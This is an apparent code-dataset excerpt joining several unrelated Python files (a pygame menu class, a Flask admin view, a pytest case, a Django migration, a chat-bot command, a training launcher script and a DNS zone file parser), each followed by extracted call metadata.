from polybius.graphics.basics.drawable import Drawable
from polybius.graphics.utils.window import Window
class Menu(Drawable, Window):
def __init__(self, pos, dims, commands, padding=0, spacing=0,
color=(80,80,80), borderColor=(0,0,0),
borderWidth=2, orientation="vertical"):
"""Initializes the menu"""
Drawable.__init__(self, "", pos, worldBound=False)
Window.__init__(self)
self._offset = (pos[0], pos[1])
self._width = dims[0]
self._height = dims[1]
h_padding = padding[0]
v_padding = padding[1]
self._borderColor = borderColor
self._borderWidth = borderWidth
self._backgroundColor = color
n = len(commands)
xStart = h_padding
yStart = v_padding
self._buttons = []
# Create buttons with a vertical configuration
if orientation == "vertical":
buttonWidth = self._width - (2*h_padding) - (2*borderWidth)
buttonHeight = (self._height - (2*v_padding) - \
((n-1)*spacing) - (2*borderWidth)) // n
for x, b in enumerate(commands):
font = pygame.font.SysFont(b["font"], b["fontSize"])
self._buttons.append((Button(b["text"],
(xStart + self._offset[0],
yStart + (x*buttonHeight) + \
(x*spacing) + self._offset[1]),
font, b["fontColor"], b["color"],
buttonHeight, buttonWidth, b["borderColor"],
b["borderWidth"]),
x+1, b["closeOnPress"], (b.get("toggleText",None),b["text"])))
# Create buttons with a horizontal configuration
elif orientation == "horizontal":
buttonWidth = (self._width - (2*h_padding) - \
((n-1)*spacing) - (2*borderWidth)) // n
buttonHeight = self._height - (2*v_padding) - (2*borderWidth)
for x, b in enumerate(commands):
font = pygame.font.SysFont(b["font"], b["fontSize"])
self._buttons.append((Button(b["text"],
(xStart + self._offset[0] +\
(x*buttonWidth) + (x*spacing),
yStart + self._offset[1]),
font, b["fontColor"], b["color"],
buttonHeight, buttonWidth, b["borderColor"],
b["borderWidth"]),
x+1, b["closeOnPress"], (b.get("toggleText",None),b["text"])))
self._selection = None
self.createDisplay()
def getButtonByText(self, text):
"""Return the button with the provided text"""
for button in self._buttons:
if button[0].getText() == text:
return button[0]
def getButtonByPosition(self, position):
"""Return the button at the given position in the menu"""
return self._buttons[position][0]
def handleEvent(self, event):
"""Handles events on the pause menu"""
for b in self._buttons:
b[0].handleEvent(event,self.select,(b,))
return self.getSelection()
def select(self, button):
"""Sets the current selection"""
b, selection, closeOnPress, toggleText = button
if closeOnPress:
self.close()
if toggleText[0] != None:
currentText = b._text
if toggleText[0] == currentText:
b.setText(toggleText[1])
else:
b.setText(toggleText[0])
self._selection = selection
def getSelection(self):
"""Returns the current selection and resets it to None"""
sel = self._selection
self._selection = None
return sel
def draw(self, screen):
"""Draws the menu on the screen"""
super().draw(screen)
# Draw buttons
for b in self._buttons:
b[0].draw(screen)
def createDisplay(self):
"""Create the display of the menu"""
# Draw the border
surfBack = pygame.Surface((self._width, self._height))
surfBack.fill(self._borderColor)
# Draw the background
surf = pygame.Surface((self._width - (self._borderWidth * 2),
self._height - (self._borderWidth * 2)))
# Apply the background color or make transparent
if self._backgroundColor == None:
surf.fill((1,1,1))
surfBack.set_colorkey((1,1,1))
else:
surf.fill(self._backgroundColor)
# Blit the widget layer onto the back surface
surfBack.blit(surf, (self._borderWidth, self._borderWidth))
self._image = surfBack
| [
"pygame.Surface",
"polybius.graphics.components.Button",
"pygame.font.SysFont",
"polybius.graphics.basics.drawable.Drawable.__init__",
"polybius.graphics.utils.window.Window.__init__"
] | [((1042, 1092), 'polybius.graphics.basics.drawable.Drawable.__init__', 'Drawable.__init__', (['self', '""""""', 'pos'], {'worldBound': '(False)'}), "(self, '', pos, worldBound=False)\n", (1059, 1092), False, 'from polybius.graphics.basics.drawable import Drawable\n'), ((1101, 1122), 'polybius.graphics.utils.window.Window.__init__', 'Window.__init__', (['self'], {}), '(self)\n', (1116, 1122), False, 'from polybius.graphics.utils.window import Window\n'), ((5079, 5122), 'pygame.Surface', 'pygame.Surface', (['(self._width, self._height)'], {}), '((self._width, self._height))\n', (5093, 5122), False, 'import pygame\n'), ((5210, 5306), 'pygame.Surface', 'pygame.Surface', (['(self._width - self._borderWidth * 2, self._height - self._borderWidth * 2)'], {}), '((self._width - self._borderWidth * 2, self._height - self.\n _borderWidth * 2))\n', (5224, 5306), False, 'import pygame\n'), ((1916, 1961), 'pygame.font.SysFont', 'pygame.font.SysFont', (["b['font']", "b['fontSize']"], {}), "(b['font'], b['fontSize'])\n", (1935, 1961), False, 'import pygame\n'), ((2923, 2968), 'pygame.font.SysFont', 'pygame.font.SysFont', (["b['font']", "b['fontSize']"], {}), "(b['font'], b['fontSize'])\n", (2942, 2968), False, 'import pygame\n'), ((2000, 2209), 'polybius.graphics.components.Button', 'Button', (["b['text']", '(xStart + self._offset[0], yStart + x * buttonHeight + x * spacing + self.\n _offset[1])', 'font', "b['fontColor']", "b['color']", 'buttonHeight', 'buttonWidth', "b['borderColor']", "b['borderWidth']"], {}), "(b['text'], (xStart + self._offset[0], yStart + x * buttonHeight + x *\n spacing + self._offset[1]), font, b['fontColor'], b['color'],\n buttonHeight, buttonWidth, b['borderColor'], b['borderWidth'])\n", (2006, 2209), False, 'from polybius.graphics.components import Button\n'), ((3007, 3215), 'polybius.graphics.components.Button', 'Button', (["b['text']", '(xStart + self._offset[0] + x * buttonWidth + x * spacing, yStart + self.\n _offset[1])', 'font', "b['fontColor']", "b['color']", 'buttonHeight', 'buttonWidth', "b['borderColor']", "b['borderWidth']"], {}), "(b['text'], (xStart + self._offset[0] + x * buttonWidth + x * spacing,\n yStart + self._offset[1]), font, b['fontColor'], b['color'],\n buttonHeight, buttonWidth, b['borderColor'], b['borderWidth'])\n", (3013, 3215), False, 'from polybius.graphics.components import Button\n')] |
from flask import flash, redirect, render_template, request, url_for
from flask_login import login_required
from sqlalchemy import and_
from . import unitOfMeasurements
from . forms import UnitOfMeasurementForm
from .. import db
from .. decorators import adminRequired
from .. models import UnitOfMeasurement
modelName = "Unit"
@unitOfMeasurements.route("/unitOfMeasurements", methods = ["GET", "POST"])
@login_required
@adminRequired
def listUnitOfMeasurements():
unitOfMeasurements = UnitOfMeasurement.query
return render_template("unitOfMeasurements/unitOfMeasurements.html", unitOfMeasurements = unitOfMeasurements)
@unitOfMeasurements.route("/units/add", methods = ["GET", "POST"])
@login_required
@adminRequired
def addUnitOfMeasurement():
operation = "Add"
form = UnitOfMeasurementForm()
# Add a new unit of measurement.
if form.validate_on_submit():
unitOfMeasurement = UnitOfMeasurement(Abbreviation = form.abbreviation.data, Name = form.name.data)
db.session.add(unitOfMeasurement)
db.session.commit()
flash("You have successfully added the new unit of measurement \"{}\".".format(unitOfMeasurement.Abbreviation), "alert alert-success")
return redirect(url_for("unitOfMeasurements.listUnitOfMeasurements"))
# Present a form to add a new unit of measurement.
breadcrumbs = [{"url" : url_for("unitOfMeasurements.listUnitOfMeasurements"), "text" : "<span class = \"glyphicon glyphicon-home\"></span>"}]
return render_template("addEdit.html", breadcrumbs = breadcrumbs, form = form, modelName = modelName, operation = operation)
@unitOfMeasurements.route("/units/addDefaultUnitsOfMeasurements", methods = ["GET", "POST"])
@login_required
@adminRequired
def addDefaultUnitsOfMeasurements():
defaultUnits = {"ASBC" : "american society of brewing chemists",
"ADF" : "apparent degree of fermentation",
"bbl" : "barrel",
"cells/ml" : "cells per milliliter",
"cells/ml/°P" : "cells per ml per degree plato",
"°C" : "degree celsius",
"°P" : "degree plato",
"°F" : "degree fahrenheit",
"°F/min" : "degree fahrenheit per minute",
"EBC" : "european brewery convention",
"gal" : "gallon",
"gpm" : "gallons per minute",
"g" : "grams",
"g/bbl" : "grams per barrel",
"g/L" : "grams per liter",
"h" : "hour",
"in" : "inches",
"IBU" : "international bittering unit",
"kg" : "kilogram",
"L" : "liters",
"mg" : "milligram",
"mL" : "milliliter",
"mm" : "millimeter",
"min" : "minute",
"ppb" : "parts per billion",
"ppm" : "parts per million",
"%" : "percentage",
"pH" : "potential of hydrogen",
"lb" : "pound",
"lb/bbl" : "pounds per barrel",
"psi" : "pounds per square inch",
"RDF" : "real degree of fermentation",
"RE" : "real extract",
"s" : "second",
"SG" : "specific gravity",
"SRM" : "standard reference method",
"t/h" : "tons per hour",
"TA" : "total acidity",
"vol" : "volumes",
"x10^12 cells" : "x10^12 cells",
"x10^6 cells" : "x10^6 cells"}
addedUnits = []
skippedUnits = []
for defaultUnit in defaultUnits:
unit = UnitOfMeasurement.query.filter(and_(UnitOfMeasurement.Abbreviation == defaultUnit,
UnitOfMeasurement.Name == defaultUnits[defaultUnit])).first()
if unit is None:
addedUnits.append(defaultUnits[defaultUnit])
unit = UnitOfMeasurement(Abbreviation = defaultUnit)
unit.Name = defaultUnits[defaultUnit]
db.session.add(unit)
else:
skippedUnits.append(defaultUnits[defaultUnit])
db.session.commit()
addedMessage = ""
alert = "alert alert-warning"
if addedUnits:
for unit in addedUnits:
if addedMessage == "":
addedMessage = "Added: {}".format(unit)
alert = "alert alert-success"
else:
addedMessage = "{}, {}".format(addedMessage, unit)
addedMessage = "{}.".format(addedMessage)
else:
addedMessage = "Added none of the default units of measurements."
flash(addedMessage, alert)
skippedMessage = ""
if skippedUnits:
for unit in skippedUnits:
if skippedMessage == "":
skippedMessage = "Skipped: {}".format(unit)
else:
skippedMessage = "{}, {}".format(skippedMessage, unit)
skippedMessage = "{} as they already exist.".format(skippedMessage)
flash(skippedMessage, "alert alert-warning")
return redirect(url_for("unitOfMeasurements.listUnitOfMeasurements"))
@unitOfMeasurements.route("/unitOfMeasurements/delete/<int:unitOfMeasurementId>", methods = ["GET", "POST"])
@login_required
@adminRequired
def deleteUnitOfMeasurement(unitOfMeasurementId):
unitOfMeasurement = UnitOfMeasurement.query.get_or_404(unitOfMeasurementId)
if unitOfMeasurement.isReferenced():
flash('Unit of Measurement "{}" is referenced by one or more element and/or event frame attribute template and/or tag and cannot be deleted.'. \
format(unitOfMeasurement.Abbreviation), "alert alert-danger")
else:
unitOfMeasurement.delete()
db.session.commit()
flash('You have successfully deleted the unit of measurement "' + unitOfMeasurement.Abbreviation + '".', "alert alert-success")
return redirect(url_for("unitOfMeasurements.listUnitOfMeasurements"))
@unitOfMeasurements.route("/unitOfMeasurements/edit/<int:unitOfMeasurementId>", methods = ["GET", "POST"])
@login_required
@adminRequired
def editUnitOfMeasurement(unitOfMeasurementId):
operation = "Edit"
unitOfMeasurement = UnitOfMeasurement.query.get_or_404(unitOfMeasurementId)
form = UnitOfMeasurementForm(obj = unitOfMeasurement)
# Edit an existing unit of measurement.
if form.validate_on_submit():
unitOfMeasurement.Abbreviation = form.abbreviation.data
unitOfMeasurement.Name = form.name.data
db.session.commit()
flash("You have successfully edited the unit of measurement \"{}\".".format(unitOfMeasurement.Abbreviation), "alert alert-success")
return redirect(url_for("unitOfMeasurements.listUnitOfMeasurements"))
# Present a form to edit an existing unit of measurement.
form.unitOfMeasurementId.data = unitOfMeasurement.UnitOfMeasurementId
form.abbreviation.data = unitOfMeasurement.Abbreviation
form.name.data = unitOfMeasurement.Name
breadcrumbs = [{"url" : url_for("unitOfMeasurements.listUnitOfMeasurements"), "text" : "<span class = \"glyphicon glyphicon-home\"></span>"},
{"url" : None, "text" : unitOfMeasurement.Name}]
return render_template("addEdit.html", breadcrumbs = breadcrumbs, form = form, modelName = modelName, operation = operation)
| [
"sqlalchemy.and_",
"flask.url_for",
"flask.flash",
"flask.render_template"
] | [((521, 625), 'flask.render_template', 'render_template', (['"""unitOfMeasurements/unitOfMeasurements.html"""'], {'unitOfMeasurements': 'unitOfMeasurements'}), "('unitOfMeasurements/unitOfMeasurements.html',\n unitOfMeasurements=unitOfMeasurements)\n", (536, 625), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((1442, 1555), 'flask.render_template', 'render_template', (['"""addEdit.html"""'], {'breadcrumbs': 'breadcrumbs', 'form': 'form', 'modelName': 'modelName', 'operation': 'operation'}), "('addEdit.html', breadcrumbs=breadcrumbs, form=form,\n modelName=modelName, operation=operation)\n", (1457, 1555), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((3828, 3854), 'flask.flash', 'flash', (['addedMessage', 'alert'], {}), '(addedMessage, alert)\n', (3833, 3854), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((6205, 6318), 'flask.render_template', 'render_template', (['"""addEdit.html"""'], {'breadcrumbs': 'breadcrumbs', 'form': 'form', 'modelName': 'modelName', 'operation': 'operation'}), "('addEdit.html', breadcrumbs=breadcrumbs, form=form,\n modelName=modelName, operation=operation)\n", (6220, 6318), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((4139, 4183), 'flask.flash', 'flash', (['skippedMessage', '"""alert alert-warning"""'], {}), "(skippedMessage, 'alert alert-warning')\n", (4144, 4183), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((4202, 4254), 'flask.url_for', 'url_for', (['"""unitOfMeasurements.listUnitOfMeasurements"""'], {}), "('unitOfMeasurements.listUnitOfMeasurements')\n", (4209, 4254), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((4834, 4965), 'flask.flash', 'flash', (['(\'You have successfully deleted the unit of measurement "\' +\n unitOfMeasurement.Abbreviation + \'".\')', '"""alert alert-success"""'], {}), '(\'You have successfully deleted the unit of measurement "\' +\n unitOfMeasurement.Abbreviation + \'".\', \'alert alert-success\')\n', (4839, 4965), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((4980, 5032), 'flask.url_for', 'url_for', (['"""unitOfMeasurements.listUnitOfMeasurements"""'], {}), "('unitOfMeasurements.listUnitOfMeasurements')\n", (4987, 5032), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((1184, 1236), 'flask.url_for', 'url_for', (['"""unitOfMeasurements.listUnitOfMeasurements"""'], {}), "('unitOfMeasurements.listUnitOfMeasurements')\n", (1191, 1236), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((1316, 1368), 'flask.url_for', 'url_for', (['"""unitOfMeasurements.listUnitOfMeasurements"""'], {}), "('unitOfMeasurements.listUnitOfMeasurements')\n", (1323, 1368), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((5720, 5772), 'flask.url_for', 'url_for', (['"""unitOfMeasurements.listUnitOfMeasurements"""'], {}), "('unitOfMeasurements.listUnitOfMeasurements')\n", (5727, 5772), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((6028, 6080), 'flask.url_for', 'url_for', (['"""unitOfMeasurements.listUnitOfMeasurements"""'], {}), "('unitOfMeasurements.listUnitOfMeasurements')\n", (6035, 6080), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((3062, 3170), 'sqlalchemy.and_', 'and_', (['(UnitOfMeasurement.Abbreviation == defaultUnit)', '(UnitOfMeasurement.Name == defaultUnits[defaultUnit])'], {}), '(UnitOfMeasurement.Abbreviation == defaultUnit, UnitOfMeasurement.Name ==\n defaultUnits[defaultUnit])\n', (3066, 3170), False, 'from sqlalchemy import and_\n')] |
from unittest import mock
import pytest
from bs4 import BeautifulSoup
from conf import wsgi
@pytest.mark.django_db
@pytest.mark.parametrize('script_name,prefix', (('/sso', '/sso/accounts/'), ('', '/accounts/')))
def test_set_script_name(rf, script_name, prefix):
environ = rf._base_environ(
PATH_INFO='/accounts/password/reset/',
CONTENT_TYPE="text/html; charset=utf-8",
REQUEST_METHOD="GET",
HTTP_X_SCRIPT_NAME=script_name,
)
response = wsgi.application(environ=environ, start_response=mock.Mock)
assert response.status_code == 200
soup = BeautifulSoup(response.content, 'html.parser')
element = soup.find(id='header-sign-in-link')
assert element.attrs['href'].startswith(prefix)
| [
"conf.wsgi.application",
"pytest.mark.parametrize",
"bs4.BeautifulSoup"
] | [((120, 219), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""script_name,prefix"""', "(('/sso', '/sso/accounts/'), ('', '/accounts/'))"], {}), "('script_name,prefix', (('/sso', '/sso/accounts/'),\n ('', '/accounts/')))\n", (143, 219), False, 'import pytest\n'), ((487, 546), 'conf.wsgi.application', 'wsgi.application', ([], {'environ': 'environ', 'start_response': 'mock.Mock'}), '(environ=environ, start_response=mock.Mock)\n', (503, 546), False, 'from conf import wsgi\n'), ((599, 645), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content', '"""html.parser"""'], {}), "(response.content, 'html.parser')\n", (612, 645), False, 'from bs4 import BeautifulSoup\n')] |
# Generated by Django 2.1.2 on 2018-11-04 16:16
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('game_catalog', '0010_auto_20181104_1036'),
]
operations = [
migrations.RemoveField(
model_name='publishedgame',
name='edition',
),
migrations.RemoveField(
model_name='publishedgame',
name='game_system',
),
migrations.RemoveField(
model_name='publishedgame',
name='isbn',
),
migrations.RemoveField(
model_name='publishedgame',
name='publisher',
),
]
| [
"django.db.migrations.RemoveField"
] | [((273, 339), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""publishedgame"""', 'name': '"""edition"""'}), "(model_name='publishedgame', name='edition')\n", (295, 339), False, 'from django.db import migrations, models\n'), ((384, 454), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""publishedgame"""', 'name': '"""game_system"""'}), "(model_name='publishedgame', name='game_system')\n", (406, 454), False, 'from django.db import migrations, models\n'), ((499, 562), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""publishedgame"""', 'name': '"""isbn"""'}), "(model_name='publishedgame', name='isbn')\n", (521, 562), False, 'from django.db import migrations, models\n'), ((607, 675), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""publishedgame"""', 'name': '"""publisher"""'}), "(model_name='publishedgame', name='publisher')\n", (629, 675), False, 'from django.db import migrations, models\n')] |
import asyncio
from bashbot.commands import Command
from bashbot.commands.syntax import SyntaxBuilder
from bashbot.session_manager import SessionManager
class RenameCommand(Command):
def __init__(self):
super().__init__()
self.name = "Rename terminal"
self.aliases = [".rename"]
self.description = "Renames terminal session"
self.usage = ".rename <new_name>"
self.permission = "session.rename"
self.syntax = SyntaxBuilder() \
.param("new_name", "rename") \
.build()
async def rename(self, client, message, parameters):
session = SessionManager.get_session(message.channel)
if session:
if not len(parameters["new_name"]) > 20:
session.name = parameters["new_name"]
else:
await client.send_message(message.channel, ":no_entry_sign: Maximum length of session name is 20. Your is: %s" % len(parameters["name"]))
return
session.send_output(asyncio.get_event_loop())
else:
await client.send_message(message.channel, ":no_entry_sign: You are trying to freeze non-existing session")
| [
"bashbot.session_manager.SessionManager.get_session",
"asyncio.get_event_loop",
"bashbot.commands.syntax.SyntaxBuilder"
] | [((627, 670), 'bashbot.session_manager.SessionManager.get_session', 'SessionManager.get_session', (['message.channel'], {}), '(message.channel)\n', (653, 670), False, 'from bashbot.session_manager import SessionManager\n'), ((1027, 1051), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (1049, 1051), False, 'import asyncio\n'), ((473, 488), 'bashbot.commands.syntax.SyntaxBuilder', 'SyntaxBuilder', ([], {}), '()\n', (486, 488), False, 'from bashbot.commands.syntax import SyntaxBuilder\n')] |
import os, sys
if __name__ == "__main__":
negative_identity_weight = [0, 0, 0]
positive_identity_weight = [0, 0, 0]
negative_classes_weight = [0, 0, 0]
positive_classes_weight = [0, 0, 0]
negative_policy_weight = [0, 0, 0]
positive_policy_weight = [0, 0, 0]
for i in range(len(negative_identity_weight)):
log = f'log/cifar10/icpkd/resnet18_from_resnet50_option_1_{i}_2倍.txt'
os.system("rm -rf ./resource")
os.system(f"python ./SST/image_classification_policy.py --log {log}")
print(f"============================end {i}================================") | [
"os.system"
] | [((421, 451), 'os.system', 'os.system', (['"""rm -rf ./resource"""'], {}), "('rm -rf ./resource')\n", (430, 451), False, 'import os, sys\n'), ((460, 529), 'os.system', 'os.system', (['f"""python ./SST/image_classification_policy.py --log {log}"""'], {}), "(f'python ./SST/image_classification_policy.py --log {log}')\n", (469, 529), False, 'import os, sys\n')] |
#!/usr/bin/env python3
"""
Limits:
- can't read brackets in brackets
- avoid using more then one bracket per line. Normally it should work, but you should use it carefull
- problems by differncing ttl/domaine, if domain[:-1].isdigit()"""
VERSION = 1.1
DOMAIN_MAX_LENGHT = 255
CLASSES = ["IN", "HS", "CH", "CS"]
RRsTYPES = ["A","AAAA", "A6", "AFSDB", "APL", "CERT", "CNAME", "DHCID", "DNAME",
"DNSKEY", "DS", "GPOS", "HINFO", "IPSECKEY", "ISDN", "KEY", "KX", "LOC",
"MX", "NAPTR", "NSAP", "NS", "NSEC", "NSEC3","NSEC3PARAM", "NXT", "PTR",
"PX", "RP", "PRSIG", "RT", "SIG", "SOA", "SPF", "SRV", "SSHFP", "TXT", "WKS", "X25"]
from time import strftime
class ZoneFileError(Exception):
"""Simple Exception handler"""
def __init__(self, error, file):
self.error = str(error)
self.file = str(file)
def __str__(self):
return """Please check the given zone file {0}.\nFollowing Error occured: {1}""".format(self.file, self.error)
class _Parser():
"""Main Parser"""
def __init__(self, file):
self.file = file
self.zone = list()
self.Table = list() # format: [primKey, name, ttl, class, type, value]
self.stream = open(file)
self.zone_org = self.stream.read()
self.stream.close()
self.zone = self.zone_org.splitlines()
self.rmComment()
self.rmCompleteParanthese()
self.split()
self.cleanUp()
self.parse()
def error(self, error):
"""returns error"""
raise ZoneFileError(error, self.file)
def getIndexe(self, pattern):
"""return every index of fitting patter"""
self.counter = 0
self.result = list()
for i in range(self.zone_org.count(pattern)):
self.result.append(self.zone_org.find(pattern, self.counter))
self.counter = self.result[-1] + 1
return self.result
def rmComment(self):
"""Removes comments from zone (;, #, /**/, //)"""
if ";" in self.zone_org: self.zone = [i.split(";")[0] for i in self.zone if i != ";"]
if "#" in self.zone_org: self.zone = [i.split("#")[0] for i in self.zone if i != "#"]
if "//" in self.zone_org: self.zone = [i.split("//")[0] for i in self.zone if i != "//"]
if "/*" in self.zone_org:
self.pop = list()
self.counter = False
for i in range(len(self.zone)):
if "/*" in self.zone[i]:
self.counter = True
self.zone[i] = self.zone[i].split("/*")[0]
continue
if "*/" in self.zone[i]:
self.pop.append(i) # warnig: complete line is removed. Problem with: /*comment\nbla\nbla*/command?
self.counter = False
continue
if self.counter:
self.pop.append(i)
self.pop.sort(reverse = True) # To avoid collaps of mapping
for i in self.pop:
self.zone.pop(i)
def move(self, index):
"""Merge index + 1 with index."""
self.zone[index] += " " + self.zone[index + 1]
self.zone.pop(index + 1)
def rmParanthese(self):
"""removes paranthes if closed from zone file line"""
self.zone = [self.zone[i].replace("(", "").replace(")", "") if self.zone[i].count("(") == self.zone[i].count(")") else self.zone[i] for i in range(len(self.zone))]
def mergeParanthese(self):
"""Merge every paranthes to one line"""
self.paranthese = 0
self.subt = 0
for i in range(len(self.zone)):
i -= self.subt # to compense the mapping collaps
try:
self.zone[i]
except IndexError:
break
if "(" in self.zone[i]:
self.paranthese += 1
self.use_index = i
continue
if ")" in self.zone[i]:
self.paranthese -= 1
self.move(self.use_index)
self.subt += 1
continue
if self.paranthese:
self.move(self.use_index)
self.subt += 1
def rmCompleteParanthese(self):
"""removes every paranthes from zone by merging"""
self.count = 0
while [i for i in self.zone if "(" in i or ")" in i]:
self.count += 1
self.rmParanthese()
self.mergeParanthese()
if self.count > 100:
self.error("Paranthese Syntax: Please avoid using Paranthese in Paranthese or more then more paranthese per line")
self.rmParanthese()
del self.count
def split(self):
"""splits zone to fields"""
self.zone = [i.split() for i in self.zone]
def handle(self, primKey, Name, TTL, Class, Type, Value):
"""Handler for parser return. Here you get all data -> api""" # later mySQL?
self.Table.append([primKey, Name, TTL, Class, Type, Value])
def isType(self, object):
"""returns true if object is a entry type like NS, eg."""
return True if object in RRsTYPES else False
def isClass(self, object):
"""returns True if obeject is a class like IN, eg."""
return True if object in CLASSES else False
def isTTL(self, liste):
"""returns True if given list from zone is TTL record"""
return True if liste[0] == '$TTL' and len(liste) < 3 else False
def isTTLobj(self, object):
"""Returns if given object is ttl. Warning: it's just probatly correct"""
return True if object[:-1].isdigit() else False # -1 because of 23h for eg.
def cleanUp(self):
"""removes empty strings and lists from zone"""
self.zone = [i for i in self.zone if i and i[0] != '']
def getType(self, liste):
"""returns type of given entry"""
for i in liste:
if self.isType(i):
return i
def getClass(self, liste):
"""returns class of given entry"""
for i in liste:
if self.isClass(i):
return i
def parse(self):
"""Main Parser"""
self.primKey = 0
for entry in self.zone:
if self.isTTL(entry):
self.default_TTL = entry[1] # default ttl
continue
self.type = self.getType(entry)
self.klasse = self.getClass(entry)
if self.type:
self.default_type = self.type
else:
try:
self.type = self.default_type
except NameError:
self.error("Please check your zonfile. Error at {0}.\nType not found".format(" ".join(entry)))
if self.klasse:
self.default_klasse = self.klasse
else:
try:
self.klasse = self.default_klasse
except NameError:
self.error("Please check your zonfile. Error at {0}.\nClass not found".format(" ".join(entry)))
self.typeindex = entry.index(self.type)
self.value = " ".join(entry[self.typeindex+1:])
entry = entry[:self.typeindex] # left: probatly name, probatly ttl, probatly class
self.over = len(entry)
if self.over == 3:
if entry.pop(2) != self.klasse:
self.error("There occured a fatal logical error at {0}.\nPlease contact support for more information".format(" ".join(entry)))
self.over = len(entry)
if self.over == 2: # Possible: class, ttl, name but: entry[1] = {TTL//class} -> !name
if entry[1] == self.klasse:
entry.pop()
else:
self.ttl = entry.pop() # Has to be ttl
self.over = len(entry)
if self.over == 1: # possible: name, class, ttl
if entry[0] == self.klasse:
entry.pop()
elif self.isTTLobj(entry[0]):
print("warning at {0}. I'll handle it as TTL!".format(" | ".join([str(y) for y in (self.primKey, self.name, entry[0], self.klasse, self.type, self.value)]))) # carefull!!! 123456d as dom -> undifined error
self.ttl = entry.pop()
else:
self.name = entry[0]
try:
self.ttl = self.default_TTL
except AttributeError:
self.error("Please check your zonfile. TTL not found")
self.handle(self.primKey, self.name,self.ttl, self.klasse, self.type, self.value)
del self.value
self.primKey += 1
class Parser():
"""Paser - Friendly User API"""
def __init__(self, file):
import os.path as path
self.file = file
self.parser = _Parser(file)
self.table = self.parser.Table
self.TTL = self.parser.default_TTL
self.zonename = path.basename(self.file)
del self.parser # RAM clean
def getValues(self):
"""returns set of all available Values in the Zone"""
return set([i[5] for i in self.table])
def getTypes(self):
"""returns set of all available Types in the Zone"""
return set([i[4] for i in self.table])
def getClasses(self):
"""returns set of all available classes in the Zone"""
return set([i[3] for i in self.table])
def getTTLs(self):
"""returns set of all available TTLs in the Zone (Normaly one)"""
return set([i[2] for i in self.table])
def getDomains(self):
"""returns set of all available Domains in the Zone"""
return set([i[1] for i in self.table])
def getIDs(self):
"""returns set of all available ID's // prim. keys of internal table"""
return set([i[0] for i in self.table])
def getDefaultTTL(self):
"""Returns last used TTL"""
return self.TTL
def getRecords(self, ID = False, Domain = False, TTL = False, Class = False, Type = False, Value = False):
"""MetaGer - returns list of matching rows"""
self.result = list()
for i in self.table:
if ID and ID != i[0]: continue
if not isinstance(ID, bool) and ID == 0 and i[0] != 0: continue
if Domain and Domain != i[1]: continue
if TTL and TTL != i[2]: continue
if Class and Class != i[3]: continue
if Type and Type != i[4]: continue
if Value and Value != i[5]: continue
self.result.append(i)
return self.result
def getValue(self, Value):
"""Returns entrys matching the given value"""
return [i for i in self.table if i[5] == Value]
def getType(self, Type):
"""Returns entrys matching the given type"""
return [i for i in self.table if i[4] == Type]
def getClass(self, Class):
"""Returns entrys matching the given class"""
return [i for i in self.table if i[3] == Class]
def getTTL(self, TTL):
"""Returns entrys matching the given TTL"""
return [i for i in self.table if i[2] == str(TTL)]
def getName(self, Name):
"""Returns entrys matching the given name"""
return [i for i in self.table if i[1] == Name]
def getID(self, ID):
"""Returns entrys matching the given ID"""
return [i for i in self.table if i[0] == ID]
def getMaster(self):
"""Returns Master-field of SOA record"""
return self.getType("SOA")[0][5].split()[0]
def getZoneContact(self):
"""Returns contact-field of SOA record"""
return self.getType("SOA")[0][5].split()[1]
def getSerial(self):
"""Returns serial-field of SOA record"""
return self.getType("SOA")[0][5].split()[2]
def getRefreshTime(self):
"""Returns refersh time - field of SOA record"""
return self.getType("SOA")[0][5].split()[3]
def getRetryTime(self):
"""Returns retry time - field of SOA record"""
return self.getType("SOA")[0][5].split()[4]
def getExpireTime(self):
"""Returns expire time - field of SOA record"""
return self.getType("SOA")[0][5].split()[5]
def getNegativeCache(self):
"""Returns negative cache time - field of SOA record"""
return self.getType("SOA")[0][5].split()[6]
def getIPv4(self):
"""Return current IPv4 addr of origin"""
return self.getRecords(Domain = "@", Class = "IN", Type="A")[0][5]
def getIPv6(self):
"""Return current IPv6 addr of origin"""
return self.getRecords(Domain = "@", Class = "IN", Type="AAAA")[0][5]
def mkSerial(self, check = True):
"""Sets timestamp allone. If check, no serial > 99 are supported"""
self.old_time = self.getSerial()[:8]
self.new_time = strftime("%Y%m%d")
if self.old_time != self.new_time:
self.serial = "01"
else:
self.serial = str(int(self.getSerial()[8:]) + 1)
if check: assert int(self.serial) < 100, """More then 99 changes aren't supported per day."""
if len(self.serial) < 2:
self.serial = "0{0}".format(self.serial)
return "{0}{1}".format(self.new_time, self.serial)
def refresh(self):
"""Reloads complete zone"""
self.__init__(self.file)
def convert2sqlite(self, file, table = None, commit = True):
"""Writes results to sql database. If table not given, zonename is used
if commit = [True] chnages are automatic committed to db,
else connection object is returned"""
import sqlite3 as sql
if table: self.tableName = table
else: self.tableName = self.zonename
self.connection = sql.connect(file)
self.cursor = self.connection.cursor()
self.cursor.execute("drop table if exists '{0}'".format(self.tableName)) # insecure !!! Problems: "db.mydomain.local".count(".") != 0 -> mySQL Syntax error
self.cursor.execute("""CREATE TABLE '{0}'
(id INT,
domain VARCHAR({1}) NOT NULL,
ttl INT,
class VARCHAR({2}) NOT NULL,
type VARCHAR({3}) NOT NULL,
value TEXT NOT NULL)""".format(self.tableName, DOMAIN_MAX_LENGHT,
max([len(i) for i in RRsTYPES]),
max([len(i) for i in CLASSES]))) # also insecure
